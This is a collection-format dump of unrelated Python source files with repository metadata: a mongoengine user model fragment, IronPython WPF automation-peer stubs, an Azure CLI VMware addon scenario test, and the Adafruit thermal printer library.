    # Fix: the default was datetime.now() -- evaluated once at import time,
    # so every document shared the interpreter's start-up timestamp. Passing
    # the callable makes mongoengine evaluate it per saved document.
    signup_time = DateTimeField(required=True, default=datetime.now)
    id = StringField(primary_key=True)  # user id (also the Mongo _id)
    pw = StringField(required=True)     # password (stored as given by caller)

    meta = {'allow_inheritance': True}  # UserModel/AdminModel inherit from this
class UserModel(UserBase):
    """
    Common User
    """
    belonging_libraries = ListField(ReferenceField(LibraryModel, required=True))
    # Libraries the user belongs to
class AdminModel(UserBase):
    """
    Admin
    """
    managing_library = ReferenceField(LibraryModel, required=True)
    # The library this admin manages
class RefreshTokenModel(Document):
    """
    Manages Refresh Token
    """
    refresh_token = UUIDField(primary_key=True)
    owner = ReferenceField(UserBase, required=True)
    # Password snapshot taken at token issue time; presumably used to
    # invalidate the token when the password changes -- confirm with callers.
    pw_snapshot = StringField(required=True)
| 21 | 80 | 0.693878 |
846e3fc3528b348df206e8876c674361614747cb | 14,716 | py | Python | stubs.min/System/Windows/Automation/Peers_parts/CalendarAutomationPeer.py | ricardyn/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | 1 | 2021-02-02T13:39:16.000Z | 2021-02-02T13:39:16.000Z | stubs.min/System/Windows/Automation/Peers_parts/CalendarAutomationPeer.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | stubs.min/System/Windows/Automation/Peers_parts/CalendarAutomationPeer.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | class CalendarAutomationPeer(FrameworkElementAutomationPeer,IGridProvider,IMultipleViewProvider,ISelectionProvider,ITableProvider,IItemContainerProvider):
"""
Exposes System.Windows.Controls.Calendar types to UI Automation.
CalendarAutomationPeer(owner: Calendar)
"""
def GetAcceleratorKeyCore(self,*args):
"""
GetAcceleratorKeyCore(self: UIElementAutomationPeer) -> str
Gets the accelerator key for the System.Windows.UIElement that is associated
with this System.Windows.Automation.Peers.UIElementAutomationPeer. This method
is called by System.Windows.Automation.Peers.AutomationPeer.GetAcceleratorKey.
Returns: The System.Windows.Automation.AutomationProperties.AcceleratorKey that is
returned by
System.Windows.Automation.AutomationProperties.GetAcceleratorKey(System.Windows.
DependencyObject).
"""
pass
def GetAccessKeyCore(self,*args):
"""
GetAccessKeyCore(self: UIElementAutomationPeer) -> str
Gets the access key for the System.Windows.UIElement that is associated with
this System.Windows.Automation.Peers.UIElementAutomationPeer.This method is
called by System.Windows.Automation.Peers.AutomationPeer.GetAccessKey.
Returns: The access key for the System.Windows.UIElement that is associated with this
System.Windows.Automation.Peers.UIElementAutomationPeer.
"""
pass
def GetAutomationControlTypeCore(self,*args):
""" GetAutomationControlTypeCore(self: CalendarAutomationPeer) -> AutomationControlType """
pass
def GetAutomationIdCore(self,*args):
"""
GetAutomationIdCore(self: FrameworkElementAutomationPeer) -> str
Gets the string that uniquely identifies the System.Windows.FrameworkElement
that is associated with this
System.Windows.Automation.Peers.FrameworkElementAutomationPeer. Called by
System.Windows.Automation.Peers.AutomationPeer.GetAutomationId.
Returns: The automation identifier for the element associated with the
System.Windows.Automation.Peers.FrameworkElementAutomationPeer,or
System.String.Empty if there isn't an automation identifier.
"""
pass
def GetBoundingRectangleCore(self,*args):
"""
GetBoundingRectangleCore(self: UIElementAutomationPeer) -> Rect
Gets the System.Windows.Rect that represents the bounding rectangle of the
System.Windows.UIElement that is associated with this
System.Windows.Automation.Peers.UIElementAutomationPeer. This method is called
by System.Windows.Automation.Peers.AutomationPeer.GetBoundingRectangle.
Returns: The System.Windows.Rect that contains the coordinates of the element.
Optionally,if the element is not both a System.Windows.Interop.HwndSource and
a System.Windows.PresentationSource,this method returns
System.Windows.Rect.Empty.
"""
pass
def GetChildrenCore(self,*args):
""" GetChildrenCore(self: CalendarAutomationPeer) -> List[AutomationPeer] """
pass
def GetClassNameCore(self,*args):
""" GetClassNameCore(self: CalendarAutomationPeer) -> str """
pass
def GetClickablePointCore(self,*args):
"""
GetClickablePointCore(self: UIElementAutomationPeer) -> Point
Gets a System.Windows.Point that represents the clickable space that is on the
System.Windows.UIElement that is associated with this
System.Windows.Automation.Peers.UIElementAutomationPeer. This method is called
by System.Windows.Automation.Peers.AutomationPeer.GetClickablePoint.
Returns: The System.Windows.Point on the element that allows a click. The point values
are (System.Double.NaN,System.Double.NaN) if the element is not both a
System.Windows.Interop.HwndSource and a System.Windows.PresentationSource.
"""
pass
def GetHelpTextCore(self,*args):
"""
GetHelpTextCore(self: FrameworkElementAutomationPeer) -> str
Gets the string that describes the functionality of the
System.Windows.ContentElement that is associated with this
System.Windows.Automation.Peers.ContentElementAutomationPeer. Called by
System.Windows.Automation.Peers.AutomationPeer.GetHelpText.
Returns: The help text,usually from the System.Windows.Controls.ToolTip,or
System.String.Empty if there is no help text.
"""
pass
def GetHostRawElementProviderCore(self,*args):
"""
GetHostRawElementProviderCore(self: AutomationPeer) -> HostedWindowWrapper
Tells UI Automation where in the UI Automation tree to place the hwnd being
hosted by a Windows Presentation Foundation (WPF) element.
Returns: This method returns the hosted hwnd to UI Automation for controls that host
hwnd objects.
"""
pass
def GetItemStatusCore(self,*args):
"""
GetItemStatusCore(self: UIElementAutomationPeer) -> str
Gets a string that communicates the visual status of the
System.Windows.UIElement that is associated with this
System.Windows.Automation.Peers.UIElementAutomationPeer. This method is called
by System.Windows.Automation.Peers.AutomationPeer.GetItemStatus.
Returns: The string that contains the
System.Windows.Automation.AutomationProperties.ItemStatus that is returned by
System.Windows.Automation.AutomationProperties.GetItemStatus(System.Windows.Depe
ndencyObject).
"""
pass
def GetItemTypeCore(self,*args):
"""
GetItemTypeCore(self: UIElementAutomationPeer) -> str
Gets a human-readable string that contains the item type that the
System.Windows.UIElement for this
System.Windows.Automation.Peers.UIElementAutomationPeer represents. This method
is called by System.Windows.Automation.Peers.AutomationPeer.GetItemType.
Returns: The string that contains the
System.Windows.Automation.AutomationProperties.ItemType that is returned by
System.Windows.Automation.AutomationProperties.GetItemType(System.Windows.Depend
encyObject).
"""
pass
def GetLabeledByCore(self,*args):
"""
GetLabeledByCore(self: UIElementAutomationPeer) -> AutomationPeer
Gets the System.Windows.Automation.Peers.AutomationPeer for the element that is
targeted to the System.Windows.UIElement for this
System.Windows.Automation.Peers.UIElementAutomationPeer. This method is called
by System.Windows.Automation.Peers.AutomationPeer.GetLabeledBy.
Returns: The System.Windows.Automation.Peers.AutomationPeer for the element that is
targeted to the System.Windows.UIElement for this
System.Windows.Automation.Peers.UIElementAutomationPeer.
"""
pass
def GetLocalizedControlTypeCore(self,*args):
"""
GetLocalizedControlTypeCore(self: AutomationPeer) -> str
When overridden in a derived class,is called by
System.Windows.Automation.Peers.AutomationPeer.GetLocalizedControlType.
Returns: The type of the control.
"""
pass
def GetNameCore(self,*args):
"""
GetNameCore(self: FrameworkElementAutomationPeer) -> str
Gets the text label of the System.Windows.ContentElement that is associated
with this System.Windows.Automation.Peers.ContentElementAutomationPeer. Called
by System.Windows.Automation.Peers.AutomationPeer.GetName.
Returns: The text label of the element that is associated with this automation peer.
"""
pass
def GetOrientationCore(self,*args):
"""
GetOrientationCore(self: UIElementAutomationPeer) -> AutomationOrientation
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer is
laid out in a specific direction. This method is called by
System.Windows.Automation.Peers.AutomationPeer.GetOrientation.
Returns: The System.Windows.Automation.Peers.AutomationOrientation.None enumeration
value.
"""
pass
def GetPattern(self,patternInterface):
"""
GetPattern(self: CalendarAutomationPeer,patternInterface: PatternInterface) -> object
Gets the object that supports the specified control pattern of the element that
is associated with this automation peer.
patternInterface: An enumeration value that specifies the control pattern.
Returns: If patternInterface is System.Windows.Automation.Peers.PatternInterface.Grid,
System.Windows.Automation.Peers.PatternInterface.Table,
System.Windows.Automation.Peers.PatternInterface.MultipleView,or
System.Windows.Automation.Peers.PatternInterface.Selection,this method returns
a this pointer; otherwise,this method returns null.
"""
pass
def GetPeerFromPointCore(self,*args):
""" GetPeerFromPointCore(self: AutomationPeer,point: Point) -> AutomationPeer """
pass
def HasKeyboardFocusCore(self,*args):
"""
HasKeyboardFocusCore(self: UIElementAutomationPeer) -> bool
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer
currently has keyboard input focus. This method is called by
System.Windows.Automation.Peers.AutomationPeer.HasKeyboardFocus.
Returns: true if the element has keyboard input focus; otherwise,false.
"""
pass
def IsContentElementCore(self,*args):
"""
IsContentElementCore(self: UIElementAutomationPeer) -> bool
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer is
an element that contains data that is presented to the user. This method is
called by System.Windows.Automation.Peers.AutomationPeer.IsContentElement.
Returns: true.
"""
pass
def IsControlElementCore(self,*args):
"""
IsControlElementCore(self: UIElementAutomationPeer) -> bool
Gets or sets a value that indicates whether the System.Windows.UIElement that
is associated with this System.Windows.Automation.Peers.UIElementAutomationPeer
is understood by the end user as interactive. Optionally,the user might
understand the System.Windows.UIElement as contributing to the logical
structure of the control in the GUI. This method is called by
System.Windows.Automation.Peers.AutomationPeer.IsControlElement.
Returns: true.
"""
pass
def IsEnabledCore(self,*args):
"""
IsEnabledCore(self: UIElementAutomationPeer) -> bool
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer
can accept keyboard focus. This method is called by
System.Windows.Automation.Peers.AutomationPeer.IsKeyboardFocusable.
Returns: A boolean that contains the value of System.Windows.UIElement.IsEnabled.
"""
pass
def IsKeyboardFocusableCore(self,*args):
"""
IsKeyboardFocusableCore(self: UIElementAutomationPeer) -> bool
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer
can accept keyboard focus. This method is called by
System.Windows.Automation.Peers.AutomationPeer.IsKeyboardFocusable.
Returns: true if the element is focusable by the keyboard; otherwise false.
"""
pass
def IsOffscreenCore(self,*args):
"""
IsOffscreenCore(self: UIElementAutomationPeer) -> bool
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer is
off the screen. This method is called by
System.Windows.Automation.Peers.AutomationPeer.IsOffscreen.
Returns: true if the element is not on the screen; otherwise,false.
"""
pass
def IsPasswordCore(self,*args):
"""
IsPasswordCore(self: UIElementAutomationPeer) -> bool
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer
contains protected content. This method is called by
System.Windows.Automation.Peers.AutomationPeer.IsPassword.
Returns: false.
"""
pass
def IsRequiredForFormCore(self,*args):
"""
IsRequiredForFormCore(self: UIElementAutomationPeer) -> bool
Gets a value that indicates whether the System.Windows.UIElement that is
associated with this System.Windows.Automation.Peers.UIElementAutomationPeer is
required to be completed on a form. This method is called by
System.Windows.Automation.Peers.AutomationPeer.IsRequiredForForm.
Returns: A boolean that contains the value that is returned by
System.Windows.Automation.AutomationProperties.GetIsRequiredForForm(System.Windo
ws.DependencyObject),if it's set; otherwise false.
"""
pass
def PeerFromProvider(self,*args):
"""
PeerFromProvider(self: AutomationPeer,provider: IRawElementProviderSimple) -> AutomationPeer
Gets an System.Windows.Automation.Peers.AutomationPeer for the specified
System.Windows.Automation.Provider.IRawElementProviderSimple proxy.
provider: The class that implements
System.Windows.Automation.Provider.IRawElementProviderSimple.
Returns: The System.Windows.Automation.Peers.AutomationPeer.
"""
pass
def ProviderFromPeer(self,*args):
"""
ProviderFromPeer(self: AutomationPeer,peer: AutomationPeer) -> IRawElementProviderSimple
Gets the System.Windows.Automation.Provider.IRawElementProviderSimple for the
specified System.Windows.Automation.Peers.AutomationPeer.
peer: The automation peer.
Returns: The proxy.
"""
pass
def SetFocusCore(self,*args):
""" SetFocusCore(self: CalendarAutomationPeer) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self,owner):
""" __new__(cls: type,owner: Calendar) """
pass
IsHwndHost=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value that indicates whether the element that is associated with this System.Windows.Automation.Peers.AutomationPeer hosts hwnds in Windows Presentation Foundation (WPF).
"""
| 42.287356 | 215 | 0.743205 |
cfda2e68734390c50ae3ba18e63b86fbfdfb6d28 | 2,864 | py | Python | src/vmware/azext_vmware/tests/latest/test_addon_scenario.py | santosh02iiit/azure-cli-extensions | 24247cfa19e2a5894937f19e17fbdc8308b28ef6 | [
"MIT"
] | 1 | 2021-12-17T01:27:06.000Z | 2021-12-17T01:27:06.000Z | src/vmware/azext_vmware/tests/latest/test_addon_scenario.py | santosh02iiit/azure-cli-extensions | 24247cfa19e2a5894937f19e17fbdc8308b28ef6 | [
"MIT"
] | 5 | 2022-03-08T17:46:24.000Z | 2022-03-23T18:27:45.000Z | src/vmware/azext_vmware/tests/latest/test_addon_scenario.py | santosh02iiit/azure-cli-extensions | 24247cfa19e2a5894937f19e17fbdc8308b28ef6 | [
"MIT"
] | 2 | 2021-09-22T08:25:32.000Z | 2021-09-24T06:55:31.000Z | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
import unittest
from azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer)
from msrestazure.azure_exceptions import CloudError
class VmwareAddonScenarioTest(ScenarioTest):
def setUp(self):
# https://vcrpy.readthedocs.io/en/latest/configuration.html#request-matching
self.vcr.match_on = ['scheme', 'method', 'path', 'query'] # not 'host', 'port'
super(VmwareAddonScenarioTest, self).setUp()
@ResourceGroupPreparer(name_prefix='cli_test_vmware_addon')
def test_vmware_addon(self):
self.kwargs.update({
'loc': 'northcentralus',
'privatecloud': 'mycloud1'
})
# create a private cloud
self.cmd('vmware private-cloud create -g {rg} -n {privatecloud} --location {loc} --sku av20 --cluster-size 4 --network-block 192.168.48.0/22 --accept-eula')
# List all existing addon
count = len(self.cmd('vmware addon list -g {rg} -c {privatecloud}').get_output_in_json())
self.assertEqual(count, 0, 'addon count expected to be 0')
# Create a VR addon
self.cmd('az vmware addon vr create -g {rg} -c {privatecloud} --vrs-count 1')
# List all existing addon
count = len(self.cmd('vmware addon list -g {rg} -c {privatecloud}').get_output_in_json())
self.assertEqual(count, 1, 'addon count expected to be 1')
# Show a VR addon
self.cmd('az vmware addon vr show -g {rg} -c {privatecloud}')
# Delete a VR addon
self.cmd('az vmware addon vr delete -g {rg} -c {privatecloud}')
# List all existing addon
count = len(self.cmd('vmware addon list -g {rg} -c {privatecloud}').get_output_in_json())
self.assertEqual(count, 0, 'addon count expected to be 0')
# Create a SRM addon
self.cmd('az vmware addon srm create -g {rg} -c {privatecloud} --license-key "41915-178A8-FF4A4-DB683-6D735"')
# List all existing addon
count = len(self.cmd('vmware addon list -g {rg} -c {privatecloud}').get_output_in_json())
self.assertEqual(count, 1, 'addon count expected to be 1')
# Show a SRM addon
self.cmd('az vmware addon srm show -g {rg} -c {privatecloud}')
# Delete a SRM addon
self.cmd('az vmware addon srm delete -g {rg} -c {privatecloud}')
# List all existing addon
count = len(self.cmd('vmware addon list -g {rg} -c {privatecloud}').get_output_in_json())
self.assertEqual(count, 0, 'addon count expected to be 0')
| 43.393939 | 164 | 0.606844 |
f97d700e522dc495c36024ea6faca696c7b936e1 | 16,553 | py | Python | python/Adafruit_Thermal.py | 8power8/yvetteomatic | cc323317c3fd5c160fe432c46cce629a3e648a5b | [
"WTFPL"
] | null | null | null | python/Adafruit_Thermal.py | 8power8/yvetteomatic | cc323317c3fd5c160fe432c46cce629a3e648a5b | [
"WTFPL"
] | null | null | null | python/Adafruit_Thermal.py | 8power8/yvetteomatic | cc323317c3fd5c160fe432c46cce629a3e648a5b | [
"WTFPL"
] | null | null | null | #*************************************************************************
# This is a Python library for the Adafruit Thermal Printer.
# Pick one up at --> http://www.adafruit.com/products/597
# These printers use TTL serial to communicate, 2 pins are required.
# IMPORTANT: On 3.3V systems (e.g. Raspberry Pi), use a 10K resistor on
# the RX pin (TX on the printer, green wire), or simply leave unconnected.
#
# Adafruit invests time and resources providing this open source code.
# Please support Adafruit and open-source hardware by purchasing products
# from Adafruit!
#
# Written by Limor Fried/Ladyada for Adafruit Industries.
# Python port by Phil Burgess for Adafruit Industries.
# MIT license, all text above must be included in any redistribution.
#*************************************************************************
# This is pretty much a 1:1 direct Python port of the Adafruit_Thermal
# library for Arduino. All methods use the same naming conventions as the
# Arduino library, with only slight changes in parameter behavior where
# needed. This should simplify porting existing Adafruit_Thermal-based
# printer projects to Raspberry Pi, BeagleBone, etc. See printertest.py
# for an example.
#
# One significant change is the addition of the printImage() function,
# which ties this to the Python Imaging Library and opens the door to a
# lot of cool graphical stuff!
#
# TO DO:
# - Might use standard ConfigParser library to put thermal calibration
# settings in a global configuration file (rather than in the library).
# - Make this use proper Python library installation procedure.
# - Trap errors properly. Some stuff just falls through right now.
# - Add docstrings throughout!
# Python 2.X code using the library usu. needs to include the next line:
from __future__ import print_function
from serial import Serial
import time
class Adafruit_Thermal(Serial):
resumeTime = 0.0
byteTime = 0.0
dotPrintTime = 0.033
dotFeedTime = 0.0025
prevByte = '\n'
column = 0
maxColumn = 32
charHeight = 24
lineSpacing = 8
barcodeHeight = 50
printMode = 0
defaultHeatTime = 150
def __init__(self, *args, **kwargs):
# If no parameters given, use default port & baud rate.
# If only port is passed, use default baud rate.
# If both passed, use those values.
baudrate = 19200
if len(args) == 0:
args = [ "/dev/ttyAMA0", baudrate ]
elif len(args) == 1:
args = [ args[0], baudrate ]
else:
baudrate = args[1]
# Calculate time to issue one byte to the printer.
# 11 bits (not 8) to accommodate idle, start and stop bits.
# Idle time might be unnecessary, but erring on side of
# caution here.
self.byteTime = 11.0 / float(baudrate)
Serial.__init__(self, *args, **kwargs)
# Remainder of this method was previously in begin()
# The printer can't start receiving data immediately upon
# power up -- it needs a moment to cold boot and initialize.
# Allow at least 1/2 sec of uptime before printer can
# receive data.
self.timeoutSet(0.5)
self.wake()
self.reset()
# Description of print settings from page 23 of the manual:
# ESC 7 n1 n2 n3 Setting Control Parameter Command
# Decimal: 27 55 n1 n2 n3
# Set "max heating dots", "heating time", "heating interval"
# n1 = 0-255 Max heat dots, Unit (8dots), Default: 7 (64 dots)
# n2 = 3-255 Heating time, Unit (10us), Default: 80 (800us)
# n3 = 0-255 Heating interval, Unit (10us), Default: 2 (20us)
# The more max heating dots, the more peak current will cost
# when printing, the faster printing speed. The max heating
# dots is 8*(n1+1). The more heating time, the more density,
# but the slower printing speed. If heating time is too short,
# blank page may occur. The more heating interval, the more
# clear, but the slower printing speed.
heatTime = kwargs.get('heattime', self.defaultHeatTime)
self.writeBytes(
27, # Esc
55, # 7 (print settings)
20, # Heat dots (20 = balance darkness w/no jams)
heatTime, # Lib default = 45
250) # Heat interval (500 uS = slower but darker)
# Description of print density from page 23 of the manual:
# DC2 # n Set printing density
# Decimal: 18 35 n
# D4..D0 of n is used to set the printing density.
# Density is 50% + 5% * n(D4-D0) printing density.
# D7..D5 of n is used to set the printing break time.
# Break time is n(D7-D5)*250us.
# (Unsure of the default value for either -- not documented)
printDensity = 18 # 120% (can go higher, but text gets fuzzy)
printBreakTime = 4 # 500 uS
self.writeBytes(
18, # DC2
35, # Print density
(printBreakTime << 5) | printDensity)
self.dotPrintTime = 0.03
self.dotFeedTime = 0.0021
# Because there's no flow control between the printer and computer,
# special care must be taken to avoid overrunning the printer's
# buffer. Serial output is throttled based on serial speed as well
# as an estimate of the device's print and feed rates (relatively
# slow, being bound to moving parts and physical reality). After
# an operation is issued to the printer (e.g. bitmap print), a
# timeout is set before which any other printer operations will be
# suspended. This is generally more efficient than using a delay
# in that it allows the calling code to continue with other duties
# (e.g. receiving or decoding an image) while the printer
# physically completes the task.
# Sets estimated completion time for a just-issued task.
def timeoutSet(self, x):
self.resumeTime = time.time() + x
# Waits (if necessary) for the prior task to complete.
def timeoutWait(self):
while (time.time() - self.resumeTime) < 0: pass
# Printer performance may vary based on the power supply voltage,
# thickness of paper, phase of the moon and other seemingly random
# variables. This method sets the times (in microseconds) for the
# paper to advance one vertical 'dot' when printing and feeding.
# For example, in the default initialized state, normal-sized text
# is 24 dots tall and the line spacing is 32 dots, so the time for
# one line to be issued is approximately 24 * print time + 8 * feed
# time. The default print and feed times are based on a random
# test unit, but as stated above your reality may be influenced by
# many factors. This lets you tweak the timing to avoid excessive
# delays and/or overrunning the printer buffer.
def setTimes(self, p, f):
# Units are in microseconds for
# compatibility with Arduino library
self.dotPrintTime = p / 1000000.0
self.dotFeedTime = f / 1000000.0
# 'Raw' byte-writing method
def writeBytes(self, *args):
self.timeoutWait()
self.timeoutSet(len(args) * self.byteTime)
for arg in args:
super(Adafruit_Thermal, self).write(chr(arg))
# Override write() method to keep track of paper feed.
def write(self, *data):
for i in range(len(data)):
c = data[i]
if c != 0x13:
self.timeoutWait()
super(Adafruit_Thermal, self).write(c)
d = self.byteTime
if ((c == '\n') or
(self.column == self.maxColumn)):
# Newline or wrap
if self.prevByte == '\n':
# Feed line (blank)
d += ((self.charHeight +
self.lineSpacing) *
self.dotFeedTime)
else:
# Text line
d += ((self.charHeight *
self.dotPrintTime) +
(self.lineSpacing *
self.dotFeedTime))
self.column = 0
# Treat wrap as newline
# on next pass
c = '\n'
else:
self.column += 1
self.timeoutSet(d)
self.prevByte = c
# The bulk of this method was moved into __init__,
# but this is left here for compatibility with older
# code that might get ported directly from Arduino.
def begin(self, heatTime=defaultHeatTime):
self.writeBytes(
27, # Esc
55, # 7 (print settings)
20, # Heat dots (20 = balance darkness w/no jams)
heatTime, # Lib default = 45
250) # Heat interval (500 uS = slower but darker)
def reset(self):
self.prevByte = '\n' # Treat as if prior line is blank
self.column = 0
self.maxColumn = 32
self.charHeight = 24
self.lineSpacing = 8
self.barcodeHeight = 50
self.writeBytes(27, 64)
# Reset text formatting parameters.
def setDefault(self):
self.online()
self.justify('L')
self.inverseOff()
self.doubleHeightOff()
self.setLineHeight(32)
self.boldOff()
self.underlineOff()
self.setBarcodeHeight(50)
self.setSize('s')
def test(self):
self.writeBytes(18, 84)
self.timeoutSet(
self.dotPrintTime * 24 * 26 +
self.dotFeedTime * (8 * 26 + 32))
UPC_A = 0
UPC_E = 1
EAN13 = 2
EAN8 = 3
CODE39 = 4
I25 = 5
CODEBAR = 6
CODE93 = 7
CODE128 = 8
CODE11 = 9
MSI = 10
def printBarcode(self, text, type):
self.writeBytes(
29, 72, 2, # Print label below barcode
29, 119, 3, # Barcode width
29, 107, type) # Barcode type
# Print string
self.timeoutWait()
self.timeoutSet((self.barcodeHeight + 40) * self.dotPrintTime)
super(Adafruit_Thermal, self).write(text)
self.prevByte = '\n'
self.feed(2)
def setBarcodeHeight(self, val=50):
if val < 1:
val = 1
self.barcodeHeight = val
self.writeBytes(29, 104, val)
# === Character commands ===
INVERSE_MASK = (1 << 1)
UPDOWN_MASK = (1 << 2)
BOLD_MASK = (1 << 3)
DOUBLE_HEIGHT_MASK = (1 << 4)
DOUBLE_WIDTH_MASK = (1 << 5)
STRIKE_MASK = (1 << 6)
def setPrintMode(self, mask):
self.printMode |= mask
self.writePrintMode()
if self.printMode & self.DOUBLE_HEIGHT_MASK:
self.charHeight = 48
else:
self.charHeight = 24
if self.printMode & self.DOUBLE_WIDTH_MASK:
self.maxColumn = 16
else:
self.maxColumn = 32
def unsetPrintMode(self, mask):
self.printMode &= ~mask
self.writePrintMode()
if self.printMode & self.DOUBLE_HEIGHT_MASK:
self.charHeight = 48
else:
self.charHeight = 24
if self.printMode & self.DOUBLE_WIDTH_MASK:
self.maxColumn = 16
else:
self.maxColumn = 32
def writePrintMode(self):
self.writeBytes(27, 33, self.printMode)
def normal(self):
self.printMode = 0
self.writePrintMode()
def inverseOn(self):
self.setPrintMode(self.INVERSE_MASK)
def inverseOff(self):
self.unsetPrintMode(self.INVERSE_MASK)
def upsideDownOn(self):
self.setPrintMode(self.UPDOWN_MASK)
def upsideDownOff(self):
self.unsetPrintMode(self.UPDOWN_MASK)
def doubleHeightOn(self):
self.setPrintMode(self.DOUBLE_HEIGHT_MASK)
def doubleHeightOff(self):
self.unsetPrintMode(self.DOUBLE_HEIGHT_MASK)
def doubleWidthOn(self):
self.setPrintMode(self.DOUBLE_WIDTH_MASK)
def doubleWidthOff(self):
self.unsetPrintMode(self.DOUBLE_WIDTH_MASK)
def strikeOn(self):
self.setPrintMode(self.STRIKE_MASK)
def strikeOff(self):
self.unsetPrintMode(self.STRIKE_MASK)
def boldOn(self):
self.setPrintMode(self.BOLD_MASK)
def boldOff(self):
self.unsetPrintMode(self.BOLD_MASK)
def justify(self, value):
c = value.upper()
if c == 'C':
pos = 1
elif c == 'R':
pos = 2
else:
pos = 0
self.writeBytes(0x1B, 0x61, pos)
# Feeds by the specified number of lines
def feed(self, x=1):
# The datasheet claims sending bytes 27, 100, <x> will work,
# but it feeds much more than that. So it's done manually:
while x > 0:
self.write('\n')
x -= 1
# Feeds by the specified number of individual pixel rows
def feedRows(self, rows):
self.writeBytes(27, 74, rows)
self.timeoutSet(rows * dotFeedTime)
def flush(self):
self.writeBytes(12)
def setSize(self, value):
c = value.upper()
if c == 'L': # Large: double width and height
size = 0x11
self.charHeight = 48
self.maxColumn = 16
elif c == 'M': # Medium: double height
size = 0x01
self.charHeight = 48
self.maxColumn = 32
else: # Small: standard width and height
size = 0x00
self.charHeight = 24
self.maxColumn = 32
self.writeBytes(29, 33, size, 10)
prevByte = '\n' # Setting the size adds a linefeed
# Underlines of different weights can be produced:
# 0 - no underline
# 1 - normal underline
# 2 - thick underline
def underlineOn(self, weight=1):
self.writeBytes(27, 45, weight)
def underlineOff(self):
self.underlineOn(0)
def printBitmap(self, w, h, bitmap, LaaT=False):
rowBytes = (w + 7) / 8 # Round up to next byte boundary
if rowBytes >= 48:
rowBytesClipped = 48 # 384 pixels max width
else:
rowBytesClipped = rowBytes
# if LaaT (line-at-a-time) is True, print bitmaps
# scanline-at-a-time (rather than in chunks).
# This tends to make for much cleaner printing
# (no feed gaps) on large images...but has the
# opposite effect on small images that would fit
# in a single 'chunk', so use carefully!
if LaaT: maxChunkHeight = 1
else: maxChunkHeight = 255
i = 0
for rowStart in range(0, h, maxChunkHeight):
chunkHeight = h - rowStart
if chunkHeight > maxChunkHeight:
chunkHeight = maxChunkHeight
# Timeout wait happens here
self.writeBytes(18, 42, chunkHeight, rowBytesClipped)
for y in range(chunkHeight):
for x in range(rowBytesClipped):
super(Adafruit_Thermal, self).write(
chr(bitmap[i]))
i += 1
i += rowBytes - rowBytesClipped
self.timeoutSet(chunkHeight * self.dotPrintTime)
self.prevByte = '\n'
# Print Image. Requires Python Imaging Library. This is
# specific to the Python port and not present in the Arduino
# library. Image will be cropped to 384 pixels width if
# necessary, and converted to 1-bit w/diffusion dithering.
# For any other behavior (scale, B&W threshold, etc.), use
# the Imaging Library to perform such operations before
# passing the result to this function.
def printImage(self, image, LaaT=False):
import Image
if image.mode != '1':
image = image.convert('1')
width = image.size[0]
height = image.size[1]
if width > 384:
width = 384
rowBytes = (width + 7) / 8
bitmap = bytearray(rowBytes * height)
pixels = image.load()
for y in range(height):
n = y * rowBytes
x = 0
for b in range(rowBytes):
sum = 0
bit = 128
while bit > 0:
if x >= width: break
if pixels[x, y] == 0:
sum |= bit
x += 1
bit >>= 1
bitmap[n + b] = sum
self.printBitmap(width, height, bitmap, LaaT)
# Take the printer offline. Print commands sent after this
# will be ignored until 'online' is called.
def offline(self):
self.writeBytes(27, 61, 0)
# Take the printer online. Subsequent print commands will be obeyed.
def online(self):
self.writeBytes(27, 61, 1)
# Put the printer into a low-energy state immediately.
def sleep(self):
self.sleepAfter(1)
# Put the printer into a low-energy state after
# the given number of seconds.
def sleepAfter(self, seconds):
self.writeBytes(27, 56, seconds)
def wake(self):
self.timeoutSet(0);
self.writeBytes(255)
for i in range(10):
self.writeBytes(27)
self.timeoutSet(0.1)
# Empty method, included for compatibility
# with existing code ported from Arduino.
def listen(self):
pass
# Check the status of the paper using the printers self reporting
# ability. Doesn't match the datasheet...
# Returns True for paper, False for no paper.
def hasPaper(self):
self.writeBytes(27, 118, 0)
# Bit 2 of response seems to be paper status
stat = ord(self.read(1)) & 0b00000100
# If set, we have paper; if clear, no paper
return stat == 0
def setLineHeight(self, val=32):
if val < 24:
val = 24
self.lineSpacing = val - 24
# The printer doesn't take into account the current text
# height when setting line height, making this more akin
# to inter-line spacing. Default line spacing is 32
# (char height of 24, line spacing of 8).
self.writeBytes(27, 51, val)
# Copied from Arduino lib for parity; is marked 'not working' there
def tab(self):
self.writeBytes(9)
# Copied from Arduino lib for parity; is marked 'not working' there
def setCharSpacing(self, spacing):
self.writeBytes(27, 32, 0, 10)
# Overloading print() in Python pre-3.0 is dirty pool,
# but these are here to provide more direct compatibility
# with existing code written for the Arduino library.
def print(self, *args, **kwargs):
for arg in args:
self.write(str(arg))
# For Arduino code compatibility again
def println(self, *args, **kwargs):
for arg in args:
self.write(str(arg))
self.write('\n')
| 28.837979 | 74 | 0.674561 |
e8d84fcbe39acbf49977343dcb5defcc2b626c85 | 1,109 | py | Python | Day2.py | carolinamassae/advent-of-code-2021 | e8911bda88431160b53ba82ca6baa05ee869fe26 | [
"MIT"
